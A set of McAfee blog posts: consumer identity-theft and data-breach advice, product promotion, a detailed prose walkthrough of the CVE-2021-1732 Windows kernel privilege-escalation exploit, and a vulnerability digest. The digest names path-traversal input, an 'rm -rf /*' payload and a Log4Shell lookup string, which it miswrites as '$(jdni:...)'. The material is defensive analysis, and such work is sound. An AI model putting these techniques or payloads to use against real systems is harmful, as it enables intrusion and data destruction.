The Federal Trade Commission (FTC) is a government body that protects consumer interests. You can report identity theft via their portal, IdentityTheft.gov. They’ll then use the details you provide to create a free recovery plan you can use to address the effects of identity theft, like contacting the major credit bureaus or alerting the Internal Revenue Service (IRS) fraud department. You can report your case online or by calling 1-877-438-4338.
A common consequence of identity theft is a dip in the victim’s credit score. For example, a cybercriminal may take out new lines of credit in the victim’s name, accrue credit card debt, and then not pay the balance. For this reason, contacting the credit monitoring bureaus is one of the most important steps to take in identity theft cases.
There are three main agencies: TransUnion, Equifax, and Experian. You can get a free credit report from each agency every 12 months via AnnualCreditReport.com. Check the report and note all fraudulent activity or false information and flag it with the relevant bureau’s fraud department. You should also initiate a fraud alert with each agency.
A fraud alert requires any creditors to verify your identity before opening a new line of credit. This adds an extra layer of security. An initial fraud alert lasts for 90 days. Once this expires, you can prolong your protection via an extended fraud alert, which will remain valid for seven years. You can notify one of the big three bureaus to set it up. They are then required to notify the other two bureaus.
A credit freeze is another smart move, which you can do through each of the three major credit bureaus. You can either call them or start the process online. This prevents people from accessing your credit report. Lenders, creditors, retailers, landlords, and others may want to see your credit as proof of financial stability. For example, if someone tries to open a phone contract under your name, the retailer may check the credit report. If there is a credit freeze in place, they won’t be able to view it and won’t issue the contract. If you need to allow someone access to your credit report, you can temporarily lift the freeze.
Identity theft is often linked with leaked or hacked passwords. Even if you aren’t sure whether your passwords have been compromised, it’s best to play it safe. Change passwords to any affected accounts. Make sure to use strong passwords with a mix of numbers, letters, and symbols. Further, if there’s a chance to activate two-factor authentication on your accounts, this can provide added protection going forward.
Ideally, you’ll never become the victim of identity theft, but things can happen. Cybercriminals work hard, but you can stay one step ahead by taking a few preventative measures. These include:
You can further protect yourself with antivirus software like McAfee’s Total Protection plan. This can help protect your devices against spyware and viruses. You can also enhance your network security with a firewall and virtual private network (VPN). A firewall controls traffic on your internet network based on predefined security parameters, while a VPN hides your IP address and other personal data.
Don’t let concerns about identity fraud keep you from enjoying all the conveniences and perks the internet offers. McAfee’s identity theft protection services can help you stay connected while keeping you safe. Tailor your package to your household’s needs to get the safeguards you want, like ID theft coverage, VPN, and 24/7 monitoring. Our Total Protection plan also comes with $1 million in identity theft coverage to cover qualifying losses and hands-on support to help you reclaim your identity.
With McAfee by your side, you can stay online confidently.
The post What to Do If Your Identity Has Been Stolen appeared first on McAfee Blog.
If there’s a particularly clear picture that’s developed over the past couple of years, it’s that our privacy and our personal identities are worth looking out for. With that, we have your back. And here’s why.
In the U.S., reported cases of identity theft continue to rise. In the first half of 2022, the Federal Trade Commission (FTC) reported more than 600,000 cases of identity theft, with more than 230,000 of those reported cases involving credit card theft.
And that’s just what’s been reported in the U.S. Far more crime goes unreported, and it is estimated that the cost of identity theft and fraud goes well into the billions of dollars.
Yet behind each stat is a person, a family, and a household that dealt with anything from a financial headache to a major life event no thanks to identity theft and fraud. Accordingly, we’re seeing to it that every person has the tools to prevent this from happening to them.
Here’s a little bit about our approach. We looked at some of the key areas where people’s private information can be vulnerable and rolled out a set of features and services that can help make you safer than before. They’re all part of McAfee+, our latest line of comprehensive online protection. Depending on your plan and location, the following offer protections that can look after you, your privacy, and your identity—along with your devices and the things on them too.
Unsecured networks can leave us vulnerable, like when we use public Wi-Fi. What’s at issue is that a cybercriminal can potentially capture your login credentials and other personal information as you use a public network in a hotel, airport, coffee shop, library, and so forth.
So, we made sure to include a Virtual Private Network (VPN) to keep your information protected from prying eyes. It does this easily by detecting when you’re on a public network and automatically turning on your VPN. The VPN then scrambles or encrypts, your data as it flows over the network. Unlike some VPNs that require advanced settings to shield your data, our app offers seamless security.
Given that data breaches large and small continue to occur with more regularity than any of us would like, always-on monitoring of your private information is key.
Whether one of your personal accounts is hacked–or worse–another website somehow gets ahold of your data and subsequently gets breached, your data may end up on the dark web. This is where cybercriminals buy and sell information.
To detect these dangerous leaks, we included dark web monitoring, which alerts you if your log-in credentials have been exposed. It can even provide you with a link to the site that uses those credentials when the information is available. This allows you to swiftly reset your passwords, mitigating the risk.
We’ll scan some of the riskiest data broker sites and show you which ones are selling your personal info. We’ll also provide guidance on how you can remove your data from those sites and with select products, we can even manage the removal for you.
Recovering from identity fraud or theft can be expensive. Not to mention time consuming. We’ll help relieve the burden with $1M coverage for lawyer fees, travel expenses, lost wages, and more.
Should the unfortunate happen to you, we have your back. In several ways. We offer licensed recovery experts who can work with you any time, around the clock, all year long. These pros can use a limited power of attorney to do the heavy lifting for identity recovery, taking all necessary steps to repair identity and credit.
Our all-new ransomware coverage is now available, ready to help just in case—all backed by expert advice to help you find the quickest and best possible path to recovery. In addition to eligibility for up to $25,000 in reimbursement due to ransomware losses, our team of experts can help you, determine the severity of a ransomware attack and learn what immediate action steps you can take.
Knowing your safe and staying that way just got far simpler. With a colorful view, you can see exactly what your Protection Score is at a glance, which compiles your overall levels of security, privacy, and identity theft protection. Better yet, if it spots gaps in your protection, it guides you through straightforward fixes that can make you safer than before.
It’s an industry first, and something we all deserve—the ability to clearly see exactly how secure you are and to quickly shore up your protection whenever it’s needed.
Everyone has credit, and everyone needs to protect it. McAfee’s Credit Monitoring does just that. Whether the suspicious change in your report is big or small, we can help you detect it—and take the right steps to correct it.
You can put proactive protection in place by stopping unauthorized access to existing credit card, bank, and utility accounts or from new ones being opened in your name. Security freezes stop companies from looking at your credit profile, which halts the application process for loans, credit cards, utilities, new bank accounts, and more. A security freeze won’t affect your credit score.
Also on our list, we wanted to make personal protection easy to use and available across all your compatible devices. So, whether you’re out with just your phone, or at home working at your PC, you have access to your protection, and can even pick up where you left off on a different device.
Ultimately, that’s what any of us want—to enjoy the internet with confidence, knowing that whatever it is we’re doing online is secure.
The way we use the internet continues to evolve. After all, it wasn’t long ago that the idea of using a phone to see who’s at the front door may have seemed a bit odd. Let alone having a little chat with the speaker on your kitchen counter. Yet that’s where we are today. And as the internet evolves, so will we. The protection we offer will cover your increasingly connected life in whatever shape that takes.
No question about it. We’re committed to protecting you, your privacy, your identity, and certainly your devices too—and making all of it simple.
Here’s to a happy and secure year!
The post Protecting Your Privacy This Year appeared first on McAfee Blog.
The internet’s greatest feat? Fundamentally shifting how we live. Once a revelation, it quickly set our long-standing beliefs about how we work, play, and connect into a whole new context.
Today, the shifts come fast. Video meetings once felt alien. Now, they’re part of our routine. We’ve gone from setting doctor’s appointments online to actually seeing the doctor online—and from family visits to seeing everyone in seconds on a screen.
At McAfee, we’ve seen our share of shifts as well. Looking back across our thirty-plus years, we were among the first to deliver antivirus technology. First to create a biometric password manager. First to give people an intuitive Protection Score, and so much more. And we’re not stopping. We’re protecting people and their ever-changing lives. That means covering all your life online, from security to privacy to identity, in a way that adds to your confidence and enjoyment too.
Confidence and enjoyment. Those two words mark our next shift in online protection. We’re bringing those feelings to life across the McAfee experience. And it’ll redefine the way you stay safe online.
Safety has an unmistakable feeling. As we bring that feeling to online protection, you’ll see a remarkable evolution. It will look and act in bold new ways, guide you, reassure you, and most importantly, keep you safe. In all, it’s a new breed of online protection that’s helpful, even thoughtful, in the ways it looks out for you.
And this evolution is already underway. You’ll find that feeling in everyday moments as we make them simpler, freer, and safer—such as paying your bills at a coffee shop, managing your family’s healthcare from your laptop, and booking flights to catch up with old friends. Across them all, our protection will have your back, and even offer guidance when needed, all while you do you—wherever your day takes you and no matter what “online” looks like next.
There’s simply so much to see out there. And with us by your side, you’ll feel safe and stay that way. Life online will continue to surprise us. In the best of ways. And people have a right to enjoy every moment of it, confident that they’re safe and secure, in ways they can point to and feel.
That’s our next big shift. Giving you the unmistakable feeling of safety. You deserve it. More than that, it’s your right. And we’re proud to bring it to you.
The post The Feeling of Safety appeared first on McAfee Blog.
In February 2021, the company Dbappsecurity discovered a sample in the wild that exploited a zero-day vulnerability on Windows 10 x64.
The vulnerability, CVE-2021-1732, is a win32k window object type confusion leading to an OOB (out-of-bounds) write which can be used to create arbitrary memory read and write capabilities within the Windows kernel (local Elevation of Privilege (EoP)). Memory exploitation generally requires a read, write, and execute primitive to bypass modern exploit mitigations such as DEP, ASLR and CFG on hardened operating systems such as Windows 10. A data-only attack requires only a read and write primitive as it does not seek to execute malicious code in memory, but rather manipulates data structures used by the operating system to its advantage (i.e., to achieve elevated privileges).
Kernel exploits are usually the most sophisticated attack as they interact directly with the Windows kernel. When such attacks are successful, they are critical because they provide high privileges to the attacker, which can be used to increase the impact of the overall exploit chain. In this case the exploit is a Local Privilege Escalation (LPE) that targets 64-bit Windows 10 version 1909. The original sample discovered was compiled in May 2020 and reported to Microsoft in December 2020. While searching for additional findings we went through a public exploit published in March of 2021 by a researcher. Having this code publicly available may raise the potential for additional threat attackers. While we have not found clear evidence demonstrating malicious use of the proof-of-concept (POC), we did discover some variants being tested and uploaded to VirusTotal.
In this blog post, McAfee Advanced Threat Research (ATR) performed a deep dive into the analysis of the vulnerability, to identify the primitives for detection and protection. The exploit is novel in its use of a new win32k arbitrary kernel memory read primitive using the GetMenuBarInfo API, which to the best of our knowledge had not been previously known publicly.
Exploitation of CVE-2021-1732 can be divided into six stages with the end goal of escalating a process’ privileges to System. The following diagram shows the stages.
Before we dive into the details, we must give some background to win32k exploitation primitives which are used in the exploitation of CVE-2021-1732.
Win32k is a Graphical (GUI) component of the Microsoft Windows Subsystem, most of which exists in the kernel for performance reasons. It is used for graphical print of the Windows OS desktop. However, due to the win32k architecture, the kernel component of win32k still needs to be able to make calls to user mode through user-mode callback functions to facilitate window creation and management.
Kernel user-mode callbacks have been well researched as far back as 2008 and 2010, with a very comprehensive analysis in 2011 by Mandt. A win32k kernel function such as xxxCreateWindowEx will make a callback function such as xxxClientAllocWindowClassExtraBytes through the user process PEB KernelCallbackTable.
When the user-mode callback has completed, NtCallbackReturn executes and passes the expected return parameter back to the kernel. Due to the stateless nature of these callbacks, many vulnerabilities have been discovered related to the locking mechanisms on the objects leading to use-after-free (UAF) exploitation.
Win32k has been one of the most exploited components in the Windows kernel accounting for 63% of vulnerabilities from 2010 to 2018, due to its large attack surface of syscalls relative to ntdll syscalls. Win32k vulnerabilities are generally turned into data-only attacks using a read/write kernel primitive by using a desktop object known as a tagWND data structure.
There are two aspects to data-only attacks:
The tagWND data structure has two fields which make it a prime target for reading/writing within kernel memory; tagWND.cbWndExtra and tagWND.ExtraBytes. When a window is created using CreateWindowEx, it is possible to request additional bytes of memory directly after the tagWND object in memory through the cbWndExtra field in the WNDCLASSEXA structure when registering the window class.
The number of extra bytes is controlled by the cbWndExtra field, and the allocated additional memory address is located at the ExtraBytes field. The read/write primitive is created as follows:
Win32k kernel user-mode callbacks have been exploited many times by leveraging tagWND read/write capabilities within the Windows kernel for escalation of privileges such as CVE-2014-4113, CVE-2015-0057, MS15-061, CVE-2016-7255 and CVE-2019-0808.
Several primitives have been observed in the CVE-2021-1732 exploit used by the attackers; additionally, it is worth mentioning that some of them are new and not previously seen in the wild.
Prior to Windows RS4 it was trivial to leak tagWND kernel addresses using multiple techniques, such as calling HMValidateHandle to copy tagWND objects from the kernel to user desktop heap. The latest version of Windows 10 has been hardened against such trivial techniques.
However, using the spmenu kernel address leak technique and relative tagWND desktop heap offsets, once a vulnerability is discovered to overwrite a tagWND.cbWndExtra field, it is possible to achieve kernel read/write capabilities without leaking the actual tagWND kernel addresses. The spmenu technique in this exploit was used here and here, but we are not aware of the GetMenuBarInfo API ever being used before in a win32k exploit.
The following diagram shows the primitives used in CVE-2021-1732.
Great work has been done to harden the security of win32k against EoP attacks with new and improved mitigations by the Microsoft OSR team, Mandt, Google Project Zero, Schenk and Dabah. These mitigations include:
In the context of a malicious process exploiting CVE-2021-1732, the above mitigations provide no protection. However, it does not impact Google Chrome as it disallows win32k calls (Windows 8 and higher), or Microsoft Edge as it applies win32k filtering on the relevant APIs.
When a window is created using CreateWindowEx API, a tagWND object is created by the Windows operating system. This window, as explained above, can be created with a parameter to allocate extra memory using cbWndExtra.
During the windows creation process (CreateWindowEx API) a callback named xxxClientAllocWindowClassExtraBytes is triggered to allocate space in the user mode desktop heap for the tagWND.ExtraBytes (offset 0x128) per the tagWND.cbWndExtra (offset 0xc8) value size (see figure 3 and 4 below for WND1).
The location of this memory is stored as a user mode memory pointer to the desktop heap and placed at tagWND.ExtraBytes. It is then possible to convert the normal window to a console window using NtUserConsoleControl which will convert that user mode pointer at tagWND.ExtraBytes to an offset value which points into the kernel desktop heap (see figure 5 below for WND0). It is this change in value at tagWND.ExtraBytes (window type confusion) that can be exploited for an OOB write during the xxxClientAllocWindowClassExtraBytes callback window.
Per figure 6 above the following steps are required to trigger the vulnerability:
5. WND0 is then converted to a console window by calling NtUserConsoleControl which converts WND0.ExtraBytes from a user desktop heap pointer to an offset within the kernel desktop heap. This is needed later so that WND0 can write OOB to WND1.
6. Create malicious window WND_Malicious using the CreateWindowEx API
The vulnerability lies in the fact that win32kfull!xxxCreateWindowEx does not check whether the window type has changed between the time it initiates the xxxClientAllocWindowClassExtraBytes and gets the response from NtCallbackReturn.
When we call NtUserConsoleControl with WND_Malicious in the hook above, xxxConsoleControl checks if tagWND+0xE8 flag has been set to 0x800 to indicate a console window per figure below. As WND_Malicious was created as a normal window, xxxConsoleControl allocates memory at an offset within the kernel desktop heap and then frees the user desktop heap pointer existing at WND_Malicious.ExtraBytes (0ffset 0x128). It then places the offset to this new allocation in the kernel heap at WND_Malicious.ExtraBytes (0ffset 0x128) and sets the tagWND+0xE8 flag to 0x800 to indicate it’s a console window.
After returning from the callback when we issued NtCallbackReturn above, xxxCreateWindowEx does not check that the window type has changed and places the WND0+0x08 at WND_Malicious.ExtraBytes per figure 9 below. The RedirectFieldpExtraBytes checks the WND_Malicious.ExtraBytes initialized value but it is too late as WND0+0x08 has already been written to WND_Malicious.ExtraBytes (offset 0x128).
The patched win32kfull.sys has updated xxxCreateWindowEx to now check the ExtraBytes initialized value before writing the returned value from user mode to tagWND. ExtraBytes (offset 0x128) per figure 10 below.
Figure 11 below shows that tagWND. ExtraBytes is initialized to zero within xxxCreateWindowEx during normal window creation.
Figure 12 below shows that tagWND. ExtraBytes is initialized to the new offset value in the kernel desktop heap within xxxConsoleControl during console window creation. RedirectFieldpExtraBytes simply checks this initialized value to determine if the window type has changed. In addition, Microsoft have also added telemetry for detecting changes to the window type flag in the patched version.
The vulnerability within the xxxCreateWindowEx API allowed the WND_Malicious.ExtraBytes field be to set to a value of WND0 offset within the kernel desktop heap. Now any time SetWindowLongW is called on WND_Malicious it will write to WND0. By supplying an offset of 0xc8, the function will overwrite the WND0.cbWndExtra field to a large value of 0XFFFFFFF per figures 13 and 14 below.
This means it can write beyond its tagWND structure and ExtraBytes in kernel memory to fields within WND1. In addition, WND0.ExtraBytes is also overwritten with the offset to itself so calls to SetWindowLongPtrA on WND0 will write to an offset in kernel desktop heap relative to the start of WND0.
Now that the WND0.cbWndExtra field has been set to a very large value (0xFFFFFFF), anytime SetWindowLongPtrA is called on WND0 it will write into the adjacent WND1 in kernel memory per figure 15 below. By writing to specific fields in WND1 we can create a kernel address memory leak as follows:
Using the spmenu data structure kernel pointer leaked previously we can use the layout of this data structure and the GetMenuBarInfo API logic to turn it into an arbitrary kernel memory read per figures 18,19 and 20 below.
As you can see from the xxxGetMenuBarInfo function in figures 21 and 22 below, by placing our leaked kernel address at the right location in our fake spmenu data structure we can create an arbitrary kernel memory read when calling GetMenuBarInfo.
An arbitrary kernel write primitive can be easily achieved now by writing our destination address to WND1.ExtraBytes field by calling SetWindowLongPtrA on WND0 which will write OOB to WND1 relative to the offset we specify per figure 23 below
In this case the offset is 0x128 which is ExtraBytes. Then simply calling SetWindowLongPtrA on WND1 will write a specified value at the address placed in the WND1.ExtraBytes field. The arbitrary write is achieved because WND1 is a normal window (has not been converted to a console window like WND0 and WND_Malicious) and so will write to whatever address we place in WND1.ExtraBytes.
The arbitrary kernel read and write primitives can be combined to perform a data-only attack to overwrite a malicious process EPROCESS token with that of PID 4 which is System for an escalation of privilege (EoP).
The original spmenu kernel address leaked previously has a pointer to WND1 at offset 0x50 per figures 24 and 25 below. Through multiple arbitrary reads using the GetMenuBarInfo on our fake spmenu data structure with this WND1 kernel address we can eventually read the PID 4 System EPROCESS token.
By placing the destination address (malicious process EPROCESS token) at WND1.ExtraBytes then the subsequent call to SetWindowLongPtrA will write the value (PID 4 – System EPROCESS token) to that address per figures 26 and 27 below.
The exploit then restores overwritten data structure values once the EoP is complete to prevent a BSOD (Blue Screen of Death).
In this report, we undertook a deep analysis of CVE-2021-1732 which is a Local Privilege Escalation on Windows 10. Windows kernel data-only attacks are difficult to defend against, as once a vulnerability is discovered they use legitimate and trusted code through specific APIs to manipulate data structures in kernel memory.
The win32k component has been hardened through great work by Microsoft against read/write primitives, but there are still opportunities for exploitation due to its large attack surface (syscalls and callbacks) and lack of win32k filtering on a process-wide basis. It would also be great to see a system wide win32k filtering policy capability within Windows 10.
Patching is always the best solution for vulnerabilities, but a strong defense strategy such as threat hunting is also required where patching may not be possible, and to detect variants of vulnerabilities/exploits being used by campaigns.
The post Technical Analysis of CVE-2021-1732 appeared first on McAfee Blog.
If you’re reading these words, CONGRATULATIONS! You’ve made it to 2022! And even better, you found your way to ATR’s monthly security digest where we discuss our favorite vulnerabilities of the last 30 days. Feel free to pat yourself on the back, get yourself a nice cup of coffee, tea, LaCroix (you fancy!) or if you’d rather choose violence, you can go straight for the energy drink. And now that we are comfortable and energized, let’s get rolling!
Per its Wikipedia entry, Grafana is a multi-platform open-source analytics and interactive visualization web application that is widely used in the industry, with paying customers such as Bloomberg, eBay, PayPal, etc. It was revealed in early December that a path traversal vulnerability allowed an attacker to access local files due to an improper sanitization of “../../../” in its plugin path.
It also showcases one of the tightest disclosure timelines known to man:
Ok, we can hardly blame you for hearing about ANY vulnerabilities except for Log4Shell in the last 30 days. However, if your organization is using this software, you probably should have followed the disclosure last month, lest your “/etc/passwd” files are now known to the whole internet. Beyond that, there are two interesting points you can ponder while swirling your eggnog in its glass (side-rant on the disgustingness of eggnog redacted). Given how easy it is to exploit, the mere fact of the vendor fixing the bug via their public GitHub seems to have been enough to bring attention to it and get public working POCs for this vulnerability in less than 3 days following the fix. If you’re curious about how more mature open-source code bases deal with this risk, projects like Chromium rely on a separate bug tracking infrastructure that can restrict who can access the bug reports (that will spell out the security risks and test cases) combined with public commit messages with simple phrasing meant to avoid attracting the attention on the security commits.
Another interesting tidbit, the root cause of this bug is the misuse of a Go API to sanitize paths as discussed in this Twitter thread. It turns out the filepath.Clean function used to sanitize the input processed by the vulnerable code only removes excessive “../../” if the path is absolute. This is a common case of an API behaving as expected but leading to dangerous consequences. Do you know for sure the codebase of your organization is free of these problems? The impact of unpatched vulnerabilities here could be the accessing or leaking of extremely sensitive data. *pondering becomes frantic*
Obviously update the software if you’re using it, and you can also use Sigma rules to detect attack attempts. In an ideal world, your analytics platform should not be exposed to the wide internet, unlike these 87k instances, among whose 16k are still vulnerable according to Shodan. At minimum make sure your Grafana instance is behind a .htaccess prompt or similar. From a development perspective, security testing and unit tests should be leveraged to ensure the filtering you are putting in place is working the way it is intended to. And in the grand scheme of things, if you are going to process untrusted user input, don’t wing the filtering and apply thoroughly audited code patterns rather than disabling the warnings of your security tool…
“Does the walker choose the path, or the path the walker?” may have mused Garth Nix in his novel Sabriel. One thing is certain though, the path described above won’t be “walked” nor traversed by an attacker for the McAfee Network Security Platform (NSP) customers. These lucky fellows are already protected against path traversal attacks via a generic rule and can even be bestowed further protection with the creation of “custom attack” rules.
Who could have known that parsing—and sometimes even executing—untrusted input was a bad idea? Well it turns out that Apache’s log4j logging code does exactly that, and if the logged string contains the magic characters $(jdni:…) it may even fetch and execute untrusted Java code. Iterations on this attack have also highlighted the possibility to leak local secrets stored in environment variables—such as AWS keys—and given the recursiveness of the processing, it also offers many ways to evade pattern-matching detection.
Pretty much everyone. You write Java and are into logging things? Yep, you should be on top of this. You use Java based applications/servlets? Well, there’s probably some logging of untrusted user input in there. Your corporate employer uses Java based appliances or services? Pour one for your SOC and IT folks who are probably having a blast over their holiday “break”. You get it, this problem impacts the whole industry, and in all likelihood, its effects will probably keep rippling out for the years to come. To make things worse, the bug is really easy to exploit. From pen testers to SOC analysts, “script-kiddies” to nation state actors, nearly everyone has begun to explore this attack vector and we have observed massive on-going attacks with a wide gamut of payloads, ranging from cryptominers to “rm -rf /*” payloads and even a broken attempt to spread the Mirai worm. The worst is likely yet to come.
“Stranger Things” taught us that “You can’t spell America without Erica.” Similarly, you can’t spell Apache without Patch. Sort of. Upgrade! Micro-patch. Monitor traffic. Hint: if you’re internal-only application suddenly makes LDAP requests towards a remote server in a country you have no operations in, maybe something fishy is going on…
If you like chaos and and/or you are having a hard time convincing IT of the importance of this bug, get permission to demonstrate it for them! Then, set strings you can control (user-agent, twitter name, wifi SSID, …) to this $(jdni:ldap…) magic value and make it point to an IP:Port you control (or a third party service like Canarytoken if you trust them). If you detect hits on that address, you can start having a fun conversation about the necessity of upgrading their tech stack with the owners of the incoming addresses. This is where asking for permission first becomes extremely important, as if you indiscriminately put the magic string all over the places to see what happens (as you may have seen on various social media platforms), it’s likely that eventually someone will reach out to have a “fun” conversation with you and ask about that funky user-agent of yours. Obviously, before pulling a stunt like this consider that the last thing you want for Christmas is a CFAA (Computer Fraud and Abuse Act) complaint delivered right to your doorstep.
McAfee Enterprise customers are protected from many different angles (for the specifics, please visit this Knowledge Base article):
Big Sig sounds like the nickname Freud’s mother gave him. This bug is no less compelling. Early this December, Google Project Zero blogged about a vulnerability they found in Mozilla’s Network Security Services (NSS) with a CVSS score of 9.8, according to NIST’s National vulnerability database page. There is a heap overflow in the processing of certain signatures (DER-encoded DSA and RSA-PSS signatures). To put it simply, the NSS is a collection of cryptographic libraries that enable developers to use safer/heavily tested implementations of cryptographic primitives and standards (for encryption of communication, verification of the authenticity of data, and so on). The feature where the bug was found is responsible for the verification of signatures that prove the authenticity of data using various public cryptography schemes. This type of function is typically used to sign emails or documents to confirm their actual authors. Something really interesting about this bug is its relative simplicity but also its long existence; according to Project Zero’s blog, this bug was exploitable going all the back to 2012. The vulnerable code path just happened to fall between the cracks where various fuzzers used by Mozilla overlap.
If you like your signatures to be verified, and rely on the NSS library to do so, you should definitely have a look at the advisory and use the latest version of the software (NSS version 3.73/3.681 ESR or later). Firefox seems unaffected, but other software that parses signatures might be impacted (Thunderbird, LibreOffice, Evolution, Evince and more).
As usual, you want to make sure any software you are using that might be vulnerable is updated to its latest version. The patch was released on December 1st so, for starters, you’d want to make sure potential vulnerable software received an update after this date. It would also help to know which software relies on this library; while there is no magic bullet, references to files such as nss3.dll on Windows or libnss3.so on Linux are a good starting point. Beyond that, the best call is to look at release notes and potential list of third-party libraries used in any given application you may use. If you use the vulnerable library in in your own product, update the code or backport the patch.
Have you checked out our bulletins? They’re a great source of information for the critical vulnerabilities you may have missed! This may include applications that will be deploying fixes for CVE-2021-43527.
The post The Bug Report – December 2021 appeared first on McAfee Blog.
With digital life-changing so rapidly, it’s time for a new way to protect it. Welcome to McAfee Forward—the future of online protection today.
As all that change reshapes how we spend our time online, we believe that one thing remains constant: meaningful protection is a personal right. Your right. That’s how we see it here at McAfee, and we want you to go forward and enjoy your digital life with confidence. Confident that you’re safe as you bank and shop online, sure. Yet also confident as you consult your doctor online, track your fitness routines, order a pizza with the sound of your voice, start your car with your smartphone, and simply do what’s next—the umpteen other innovations yet imagined, all thanks to the internet.
So what does the future of online protection look like? You. While different technologies may come and go, the one thing that won’t change is you. The person using them. That’s why our focus is on you, your privacy, identity, and overall security, no matter what device, app, or platform you’re doing or what you’re doing it on.
No doubt about it, life online will continue to change how we go about our day in lively and unexpected ways. You have a right to enjoy it all. And you can leave that to us. We thrive on what’s new and different—and then protecting it so you can get the most out of it.
That future of online protection is indeed here today. We’ve already rolled out major updates and industry firsts that look out for you online, particularly your privacy and identity. There’s much more to come in the weeks and months ahead. Because you have a right to a life that’s always safe and enjoyable online, whatever shape it takes in the days to come.
Here’s to living that life with confidence, and to what’s on the horizon. Through it all, we have your back.
The post Welcome McAfee Forward—the Future of Online Protection Today appeared first on McAfee Blog.
It happens with more regularity than any of us like to see. There’s either a headline in your news feed or an email from a website or service you have an account with—there’s been a data breach. So what do you do when you find out that you and your information may have been caught up in a data breach? While it can feel like things are out of your hands, there are actually several things you can do to protect yourself.
Let’s start with a look at what kind of information may be at stake and why crooks value that information so much (it’s more reasons than you may think).
The fact is that plenty of our information is out there on the internet, simply because we go about so much of our day online, whether that involves shopping, banking, getting results from our doctors, or simply hopping online to play a game once in a while.
Naturally, that means the data in any given breach will vary from service to service and platform to platform involved. Certainly, a gaming service will certainly have different information about you than your insurance company. Yet broadly speaking, there’s a broad range of information about you stored in various places, which could include:
As to what gets exposed and when you might find out about it, that can vary greatly as well. One industry research report found that 60% of breaches were discovered in just days from the initial attack while others could take months or even longer to detect. Needless to say, the timeline can get rather stretched before word reaches you, which is a good reason to change your passwords regularly should any of them get swept up in a breach. (An outdated password does a hacker no good—more on that in a bit.)
The answer is plenty. In all, personal information like that listed above has a dollar value to it. In a way, your data and information are a kind of currency because they’re tied to everything from your bank accounts, investments, insurance payments—even tax returns and personal identification like driver’s licenses.
With this information in hand, a crook can commit several types of identity crime—ranging from fraud to theft. In the case of fraud, that could include running up a bill on one of your credits cards or draining one of your bank accounts. In the case of theft, that could see crooks impersonate you so they can open new accounts or services in your name. Beyond that, they may attempt to claim your tax refund or potentially get ID issued in your name as well.
Another possibility is that a hacker will simply sell that information on the dark marketplace, perhaps in large clumps or as individual pieces of information that go for a few dollars each. However it gets sold, these dark-market practices allow other fraudsters and thieves to take advantage of your identity for financial or other gains.
Most breaches are financially motivated, with some researchers saying nearly 90% of breaches are about the money. However, we’ve also seen hackers simply dump stolen information out there for practically anyone to see. The motivations behind them vary, yet could involve anything from damaging the reputation of an organization to cases of revenge.
A list of big data breaches is a blog article of its own, yet here’s a quick list of some of the largest and most impactful breaches we’ve seen in recent years:
Needless to say, it’s not just the big companies that get hit. Healthcare facilities have seen their data breached, along with the operations of popular restaurants. Small businesses find themselves in the crosshairs as well, with one report stating that 43% of data leaks target small businesses. Those may come by way of an attack on where those businesses store their records, a disgruntled employee, or by way of a compromised point-of-sale terminal in their store, office, or location.
In short, when it comes to data breaches, practically any business is a potential target because practically every business is online in some form or fashion. Even if it’s by way of a simple point-of-sale machine.
When a business, service, or organization falls victim to a breach, it doesn’t always mean that you’re automatically a victim too. Your information may not have been caught up in it. However, it’s best to act as if it was. With that, we strongly suggest you take these immediate steps.
Given the possibility that your password may be in the hands of a hacker, change it right away. Strong, unique passwords offer one of your best defenses against hackers. Update them regularly as well. As mentioned above, this can protect you in the event a breach occurs and you don’t find out about it until well after it’s happened. You can spare yourself the upkeep that involves a password manager that can keep on top of it all for you. If your account offers two-factor authentication as part of the login process, make use of it as it adds another layer of security that makes hacking tougher.
If you spot unusual or unfamiliar charges or transactions in your account, bank, or debit card statements, follow up immediately. That could indicate improper use. In general, banks, credit card companies, and many businesses have countermeasures to deal with fraud, along with customer support teams that can help you file a claim if needed.
If you haven’t done so already, consider signing up for a service that can monitor dozens of types of personal information and then alert you if any of them are possibly being misused. Identity protection such as ours gives you the added benefit of a professional recovery specialist who can assist with restoring your affairs in the wake of fraud or theft, plus up to $1 million in insurance coverage.
Our advice is to take a deep breath and get to work. By acting quickly, you can potentially minimize and even prevent any damage that’s done. With that, we have two articles that can help guide the way if you think you’re the victim of identity theft, each featuring a series of straightforward steps you can take to set matters right:
Again, if you have any concerns. Take action. The first steps take only minutes. Even if the result is that you find out all’s well, you’ll have that assurance and you’ll have it rather quickly.
The post What to Do If You’re Caught Up in a Data Breach appeared first on McAfee Blog.
The internet is meant for all to enjoy. And that’s who we’re looking out for—you and everyone who wants to enjoy life online.
We believe it’s important that someone has your back like that, particularly where some of today’s hacks and attacks can leave people feeling a little uneasy from time to time. You’ve probably seen stories about data breaches at big companies pop up in your news feed. Or perhaps you or someone you know had their debit or credit card number hacked. Problems like these are out there, unfortunate thorns in the side of the internet we’ve come to love. Yet while these issues persist, there’s plenty you can do to avoid them.
That’s where we have your back—doing all we can to make life online enjoyable for everyone, with protection that helps people finally feel safe and stay that way.
The reality is that nobody wants to deal with hackers, malware, and other attacks crop up on the internet. And while it’s important to be aware of those things, we’d rather that you didn’t have to worry about them. Protection should come easy. Whether it’s keeping your banking, shopping, and streaming secure, along with your privacy and personal info too, protection should feel simple and tailored to you. That’s what we strive for.
So as you think about protecting your life online, take a moment to consider what you’re protecting. As you do, you’ll see that it means far more than protecting your computers, phones, and other devices. Ultimately, it’s about protecting you, and all the important things connected to you. You can think of it in three ways …
What’s among the top things people say they want to protect? Their photos. Not far behind photos are all manner of digital treasures that people like to keep close, which ranges anywhere from music they’ve downloaded to old voicemails of their children, nieces, and nephews that they’ve saved over the years. Without a doubt, we have plenty of things stored on our computers and phones that we simply couldn’t do without.
Protecting these things means protecting the devices you use to store and access them. Installing comprehensive online protection software like ours is the first step. In addition to award-winning antivirus software and firewall protection to help keep hackers at bay (and away from your photos and other precious files), it goes a step further.
Our new Online Protection Score shows you just how safe you are and guides you through simple steps that can seal up gaps and improve your protection overall. In all, it’s a personalized and simple way to make sure you’re protected as possible and continually make improvements as they’re needed. It’s a way of getting expert protection without being an expert.
There’s also the “Important Stuff” in life, like our financial records, tax returns, and all the banking that we do on our phones and computers. And let’s throw shopping into mix because shopping’s important too! You can protect the important things like this, which can help hackers out of your business.
For starters, you can protect your important files three ways with our online protection by using a combination of the McAfee® File Lock and Shredder features to manage your privacy:
You can lock down your privacy even further with a VPN that can shield you automatically from snooping attacks online, whether at home or when using public Wi-Fi. It creates an encrypted connection that works like a private tunnel that hides your IP address and the things you’re doing online from cybercrooks. It’s ideal for keeping your sensitive personal information like your financial data, passwords, and browsing history hidden from both hackers and websites.
